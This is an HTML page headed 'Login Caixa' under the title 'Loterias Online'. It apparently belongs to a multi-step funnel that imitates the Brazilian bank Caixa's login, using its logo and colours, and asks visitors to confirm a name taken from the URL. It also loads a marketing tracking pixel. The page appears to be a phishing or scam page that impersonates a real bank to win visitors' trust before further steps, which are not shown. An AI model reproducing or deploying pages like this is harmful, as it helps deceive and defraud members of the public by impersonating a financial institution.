<html lang="pt-br"><head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Loterias Online</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&amp;display=swap" rel="stylesheet">

    <script>
  window.pixelId = "675787b3809ef971b27e2939";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-subids
  async
  defer
></script>

  <style>
    @font-face {
        font-family: 'Futura-Book';
        src: url('../font/Futura-Book.eot');
        src: url('../font/Futura-Book.eot?#iefix') format('embedded-opentype'),
            url('../font/Futura-Book.woff2') format('woff2'),
            url('../font/Futura-Book.woff') format('woff'),
            url('../font/Futura-Book.ttf') format('truetype'),
            url('../font/Futura-Book.svg#Futura-Book') format('svg');
        font-weight: normal;
        font-style: normal;
        font-display: swap;
    }

    body {
        font-family: 'Futura-Book' !important;
    }

    .container-bg {
        background: linear-gradient(45deg, #00a9ad, #005ca9); 
        background-size: 100%;
        background-repeat: no-repeat;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
    }

    .container-principal {
        height: auto;
        margin: 0 auto;
        background-color: white;
        width: 450px;
        max-width: 95%;
        color: black;
        background-color: #fff !important;
        border-radius: .4rem;
        box-shadow: 0px 4px 8px rgb(0 0 0 / 30%);
        padding: 3rem 4rem;
    }

    @media (max-width: 576px) {
        .container-principal {
            padding: 3rem 2rem !important;
        } 
    }

    .container-principal img {
        width: 150px;
    }

    .container-principal h1 {
        color: #0070ae;
        font-size: 1rem;
        margin-top: .4rem;
    }

    .container-principal h2 {
        color: #4d7880;
        font-size: 1.1rem;
        margin-top: 1rem;
        margin-bottom: .5rem;
        width: 100%;
        text-align: justify;
    }

    .container-principal h3 {
        color: #0070ae;
        font-size: 1rem;
        margin-top: 1.1rem;
    }

    .container-principal h3 a{
        color: #0070ae;
        font-weight: 600;
    }


    .container-principal form {
        width: 100%;
        display: flex;
        justify-content: start;
        color: #4d7880;
        font-size: 1.1rem;
        margin-top: .4rem;
    }

    .container-principal form label {
        margin-left: .4rem;
    }


    
    .botoes {
        margin-top: 1rem;
    }

    .botoes a {
        width: 100%;
    }

    .botoes button  {
        background-color: #f39200;
        color: white;
        font-weight: 500;
        width: 100%;
        border: none;
        padding: .5rem 1rem;
        font-size: 1rem;
        border-radius: .2rem;
        margin-bottom: .6rem
    }

    .botoes button:hover {
        background-color: #173e68;
    }

    button.btn-nao {
         background-color: transparent !important;
         border: solid 2px #f39200;
         color: #f39200;
    }
    
  </style></head>
  
  <body>
    <div class="container-bg">
        <div class="container-principal d-flex justify-content-center align-items-center flex-column">
            <img src="../img/logo-caixa.webp" alt="">
            <h1>Login Caixa</h1>
            <h2>Para continuar, confirme se o seu nome está corrreto.</h2>
            <h2>Nome:</h2>
            <form action="../2/">
                <input type="radio" checked=""> 
                <label id="name"></label><br>
            <input type="hidden" name="utm_source" value="organic"><input type="hidden" name="utm_campaign" value=""><input type="hidden" name="utm_medium" value=""><input type="hidden" name="utm_content" value=""><input type="hidden" name="utm_term" value=""><input type="hidden" name="xcod" value="organichQwK21wXxRhQwK21wXxRhQwK21wXxRhQwK21wXxR"><input type="hidden" name="sck" value="organichQwK21wXxRhQwK21wXxRhQwK21wXxRhQwK21wXxR"></form>  
            
            <div class="botoes w-100 d-flex flex-column justify-content-center align-items-center">
                <a href="../3/"><button>Sim, sou eu</button></a>
                <a href="../1/"><button class="btn-nao">Quero alterar meus dados</button></a>
            </div>

            
            <h3><a href="../2/">Preciso de ajuda</a></h3>
        </div>
    </div>

    

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-kenU1KFdBIe4zVF0s0G1M5b4hcpxyD9F7jL+jjXkk+Q2h455rYXK/7HAuoJl+0I4" crossorigin="anonymous"></script>

    <script>
        // Função para obter parâmetros da URL
        function getParameterByName(name, url = window.location.href) {
            name = name.replace(/[\[\]]/g, '\\$&');
            const regex = new RegExp(`[?&]${name}(=([^&#]*)|&|#|$)`);
            const results = regex.exec(url);
            if (!results) return null;
            if (!results[2]) return '';
            return decodeURIComponent(results[2].replace(/\+/g, ' '));
        }
    
        // Recuperar o nome do parâmetro "name" na URL
        const nome = getParameterByName('name');
    
        // Verificar se o nome está disponível
        if (nome) {
            // Atualizar o elemento <label> com o nome
            document.getElementById('name').textContent = nome;
        } else {
            console.error('Nome não encontrado na URL.');
            document.getElementById('name').textContent = 'Nome não disponível.';
        }
    </script>
    
  
</body></html>